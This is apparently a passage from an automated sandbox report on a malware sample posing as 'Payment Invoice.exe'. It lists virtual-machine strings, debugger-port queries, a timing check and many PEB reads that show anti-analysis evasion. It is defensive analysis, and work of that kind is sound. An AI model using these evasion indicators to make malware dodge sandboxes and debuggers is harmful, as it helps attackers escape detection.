                      Source: explorer.exe, 0000000F.00000002.921899750.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000F.00000000.757463249.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000F.00000000.745694978.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 0000000F.00000000.746093620.0000000004791000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA~
                      Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: explorer.exe, 0000000F.00000000.757724788.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: explorer.exe, 0000000F.00000000.757724788.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_00409A80 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0040ACC0 LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CC962 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CB171 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CB171 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EB944 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EB944 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E4120 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F513A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F513A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9100 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9100 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9100 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CB1E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CB1E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CB1E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017541E8 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F61A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F61A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017469A6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FA185 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EC182 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01782073 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01791074 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E0050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E0050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01747016 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01747016 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01747016 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01794015 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01794015 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C58EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C40E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C40E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C40E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175B8D0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FF0BF mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FF0BF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FF0BF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017090AF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9080 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01743884 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01743884 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CDB60 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F3B7A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F3B7A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01798B58 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CDB40 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CF358 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178131B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EDBE9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017453CA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017453CA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F4BAD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F4BAD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F4BAD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01795BA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D1B8F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D1B8F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178138A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0177D380 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FB390 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0170927A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0177B260 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0177B260 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01798A62 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01754257 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178EA55 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01704A2C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01704A2C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D8A0A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178AA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178AA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E3A1C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CAA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CAA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C5210 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C5210 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C5210 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C5210 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2AE4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2ACB mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DAAB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DAAB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FFAB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FD294 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FD294 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EC577 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EC577 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01703D43 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01743540 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01773D40 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E7D50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178E539 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0174A537 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01798D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F4D3B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F4D3B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F4D3B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CAD30 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01778DF1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DD5E0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DD5E0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746DC9 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F35A1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017905AC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017905AC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F1DB5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F1DB5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F1DB5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FFD9B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FFD9B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016E746D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FA44B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175C450 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175C450 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FBC2C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0179740D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0179740D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0179740D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
